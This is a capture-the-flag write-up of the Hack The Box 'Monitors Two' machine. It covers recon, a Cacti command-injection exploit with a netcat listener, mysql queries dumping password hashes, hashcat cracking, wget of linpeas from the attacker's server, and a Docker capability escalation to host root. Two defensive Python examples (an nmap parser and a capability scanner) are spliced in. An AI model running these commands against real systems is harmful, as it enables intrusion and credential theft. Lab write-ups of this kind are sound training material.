Monitors Two Machine - Hack The Box - Writeup

Recon

First we launch an nmap scan that lists the open ports on the machine. Initially we do it over TCP and export the result in grepable format, so that it can be filtered with regular expressions, which speeds up the search a bit when filtering with grep.

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.211 -oG allPorts
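The grepable file written by -oG above can be parsed instead of eyeballed. As an added example that is not part of the original writeup, the following Python parses that format (one tab-separated "Host:" line per host, with "Ports:" entries of the form port/state/protocol/owner/service/rpc/version/) and compares the open ports against an allowlist of expected exposure; the sample scan text is constructed, not the writeup's real allPorts file.

```python
import re
from collections import defaultdict

# Constructed sample of nmap -oG output (not the writeup's real allPorts file)
SAMPLE_OG = """# Nmap 7.93 scan initiated as: nmap -p- --open -sS -oG allPorts 10.10.11.211
Host: 10.10.11.211 ()\tStatus: Up
Host: 10.10.11.211 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///\tIgnored State: closed (65533)
# Nmap done -- 1 IP address (1 host up) scanned
"""

# One port entry: port/state/protocol/owner/service/rpc info/version/
PORT_RE = re.compile(r"(\d+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


def parse_grepable(text):
    """Return {host: [(port, state, proto, service, version), ...]} from -oG text."""
    hosts = defaultdict(list)
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment lines ("# Nmap ...") carry no port data
        # Fields are tab-separated "Name: value" pairs
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        host = fields["Host"].split()[0]  # "10.10.11.211 ()" -> "10.10.11.211"
        for entry in fields.get("Ports", "").split(","):
            m = PORT_RE.match(entry.strip())
            if m:
                port, state, proto, _owner, service, _rpc, version = m.groups()
                hosts[host].append((int(port), state, proto, service, version))
    return dict(hosts)


def open_ports(hosts, host):
    """Sorted list of port numbers reported open for one host."""
    return sorted(p for p, state, *_ in hosts.get(host, []) if state == "open")


def unexpected(hosts, allowlist):
    """Open ports outside the per-host allowlist, e.g. {"10.10.11.211": {22}}."""
    return {h: [p for p in open_ports(hosts, h) if p not in allowlist.get(h, set())]
            for h in hosts}
```

Run with the real allPorts file by passing its contents to parse_grepable; anything returned by unexpected is exposure the owner did not plan for.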


We get two open ports, but we need more information about them, so we launch some basic reconnaissance scripts to find out the name and version of the service running on each port:

nmap -sCV -p22,80 10.10.11.211 -oN targeted


We note that SSH is available, but for now we set it aside since we have no credentials. We focus on port 80 and open it in a browser to see what the page shows us.

Enumeration


It shows us a login page. We can try some simple SQL injections to see if they have any effect:


It seems to have no effect. We can also try common credentials such as admin:admin, root:root and guest:guest:


But none have an effect.

Cacti

Let's look up Cacti. Cacti is a complete graphing, network monitoring and data collection solution that harnesses the power of RRDtool. With Cacti you can poll services at predetermined intervals and graph the resulting data. Its main function is to help you manage the performance of the equipment on your network.

Once we know what Cacti is, we can look for vulnerabilities specific to the version used on the website:

We note that there is a vulnerability, CVE-2022-46169, that allows command injection without authentication. There are two ways to exploit it: the first is through the Metasploit framework, which makes the attack a bit easier, and the second is through a Python script that gives us the same result in a slightly more traditional way.

Exploit

We download the following repository onto our attacking machine: Repo

Within this script we modify the host (the IP address of the victim machine) and the port. We can also modify the payload, but the default one works wonderfully:

We execute the script:


And with netcat we listen on port 1234:

nc -lvnp 1234


Navigating to the root of the machine's filesystem we find an interesting entrypoint.sh file:


Let's read what's inside it:


It contains database credentials. Let's list all the tables in the database:

mysql --host=db --user=root --password=root cacti -e "show tables"


Let's list the records in the user_auth table:

mysql --host=db --user=root --password=root cacti -e "select * from user_auth"


We can see that there is a field called password. Let's select only the hashes so the data is easier to read:

mysql --host=db --user=root --password=root cacti -e "select password from user_auth"


In total we have 3 hashes. We can try to crack them with hashcat (mode 3200 is bcrypt) as follows:

hashcat -m 3200 -a 0 passMarcus.txt /usr/share/wordlists/rockyou.txt

In a few minutes we have the password for marcus:


Let's write this password down somewhere and remember the other open port on the machine:

User Flag

Remember that port 22 was open. Let's try these credentials over SSH to see if we can log in:


And we have a connection. Let's look for the flag:


Root Flag

If we are curious about the SSH login message saying that we have mail, let's check it:


Three vulnerabilities are mentioned. If we pay attention, the last one refers to a container, so we can run enumeration both on the host machine and in the container in search of a way to escalate privileges:

We start an HTTP server with Python:

python3 -m http.server 80


And with wget we download linpeas.sh from it:

wget http://10.10.14.128/linpeas.sh


You can download linpeas from the official repository: Download Here

We follow the same procedure in the container:

Privilege Escalation on Docker


We find a critical vulnerability in the container. If we look up capsh on GTFOBins, it gives us a series of commands we can try in order to get a shell as root:

capsh --gid=0 --uid=0 --


Well, we have escalated privileges in the container, but what next?

If we dig deeper into the Docker vulnerability: when we have privileged access inside the container and access to the container's host, we can escalate privileges on the host. This is explained in depth in this [blog](https://www.cyberark.com/resources/threat-research-blog/how-docker-made-me-more-capable-and-the-host-less-secure).

So first we find the Docker mount point:

findmnt


We navigate to that path, where we need to create a C binary:


We fetch it with wget from our Python server and build the binary:


We assign capabilities to the binary:

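From the defender's side, this step leaves a trace: a file capability written inside the container (such as cap_setuid on a binary) is stored as the security.capability extended attribute, and the host sees the same files through the overlay mount located with findmnt. As an added example that is not part of this writeup, the following Python decodes that xattr directly (vfs_cap_data revisions 1 to 3, as laid out in the kernel headers) and walks a tree flagging files carrying high-risk capabilities; it assumes a Linux host with read access to the mount.

```python
import os
import struct

# Capability bit numbers from linux/capability.h (subset used by this audit)
CAP_NAMES = {0: "cap_chown", 2: "cap_dac_override", 6: "cap_setgid",
             7: "cap_setuid", 8: "cap_setpcap", 21: "cap_sys_admin"}
HIGH_RISK = (2, 6, 7, 8, 21)
VFS_CAP_REVISION_MASK = 0xFF000000
VFS_CAP_FLAGS_EFFECTIVE = 0x00000001
CAP_WORDS = {0x01000000: 1, 0x02000000: 2, 0x03000000: 2}  # u32 pairs per revision

def decode_security_capability(raw):
    """Decode a raw security.capability xattr into
    (permitted_mask, inheritable_mask, effective_flag, rootid_or_None)."""
    (magic_etc,) = struct.unpack_from("<I", raw, 0)
    revision = magic_etc & VFS_CAP_REVISION_MASK
    if revision not in CAP_WORDS:
        raise ValueError("unknown security.capability revision 0x%08x" % revision)
    permitted = inheritable = 0
    for i in range(CAP_WORDS[revision]):  # little-endian (permitted, inheritable) pairs
        perm, inh = struct.unpack_from("<II", raw, 4 + 8 * i)
        permitted |= perm << (32 * i)
        inheritable |= inh << (32 * i)
    rootid = None
    if revision == 0x03000000:  # revision 3 appends the user-namespace root id
        (rootid,) = struct.unpack_from("<I", raw, 4 + 8 * CAP_WORDS[revision])
    return permitted, inheritable, bool(magic_etc & VFS_CAP_FLAGS_EFFECTIVE), rootid

def risky_caps(raw):
    """Names of high-risk capabilities in the file's permitted set (+p or +ep)."""
    permitted = decode_security_capability(raw)[0]
    return [CAP_NAMES[b] for b in HIGH_RISK if permitted >> b & 1]

def scan_tree(root):
    """Walk a directory (e.g. a container's overlay mount as seen from the host)
    and list files carrying high-risk file capabilities. Linux only."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                raw = os.getxattr(path, "security.capability", follow_symlinks=False)
            except OSError:  # no xattr, no permission, or the file vanished
                continue
            caps = risky_caps(raw)
            if caps:
                findings.append((path, caps))
    return findings
```

Calling scan_tree on the mount point reported by findmnt lists every binary the container side has granted capabilities to, which is the host-side signal for this technique.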

Now we only have to execute the binary we created:


And, surprise, whoami:


We get the root flag:


And congratulations, you have hacked the Monitors Two machine.